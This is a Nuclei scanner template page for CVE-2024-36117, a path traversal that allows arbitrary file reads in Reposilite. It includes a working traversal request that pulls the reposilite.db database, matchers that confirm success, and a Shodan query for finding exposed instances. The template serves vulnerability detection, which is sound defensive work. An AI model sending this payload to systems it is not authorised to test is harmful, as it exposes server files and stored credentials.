Skip to content
Nuclei Templates

Reposilite >= 3.3.0, < 3.5.12 - Arbitrary File Read

ID: CVE-2024-36117

Severity: high

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,reposilite,lfi

Description

Section titled “Description”

Reposilite is an open source, lightweight and easy-to-use repository manager for Maven based artifacts in JVM ecosystem. Reposilite v3.5.10 is affected by an Arbitrary File Read vulnerability via path traversal while serving expanded javadoc files. Reposilite has addressed this issue in version 3.5.12. There are no known workarounds for this vulnerability. This issue was discovered and reported by the GitHub Security lab and is also tracked as GHSL-2024-074.

YAML Source

Section titled “YAML Source”
id: CVE-2024-36117


info:
  name: Reposilite >= 3.3.0, < 3.5.12 - Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Reposilite is an open source, lightweight and easy-to-use repository manager for Maven based artifacts in JVM ecosystem. Reposilite v3.5.10 is affected by an Arbitrary File Read vulnerability via path traversal while serving expanded javadoc files. Reposilite has addressed this issue in version 3.5.12. There are no known workarounds for this vulnerability. This issue was discovered and reported by the GitHub Security lab and is also tracked as GHSL-2024-074.
  reference:
    - https://github.com/advisories/GHSA-82j3-hf72-7x93
    - https://github.com/dzikoysk/reposilite/commit/e172ae4b539c822d0d6e04cf090713c7202a79d6
    - https://github.com/dzikoysk/reposilite/releases/tag/3.5.12
    - https://github.com/dzikoysk/reposilite/security/advisories/GHSA-82j3-hf72-7x93
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36117
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    cvss-score: 8.6
    cve-id: CVE-2024-36117
    cwe-id: CWE-22
    epss-score: 0.00045
    epss-percentile: 0.16805
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:1212523028
  tags: cve,cve2024,reposilite,lfi


variables:
  javadoc_path: "releases/javadoc/1.0.0/"


http:
  - raw:
      - |
        GET /javadoc/{{javadoc_path}}/raw/..%5c..%2f..%2f..%2f..%2f..%2freposilite.db HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"reposilite") && contains(body,"SQLite format")'
          - 'contains(header, "application/octet-stream")'
        condition: and
# digest: 490a00463044022022fcfa7b79b4d25dd7ae38fd635f130b23ffee7654759586a2bd5f62e486cd98022051b86fbf30faad9cdffd64ec75508be9706481d57ee7b55da9de35b585b77be0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-36117.yaml"

View on Github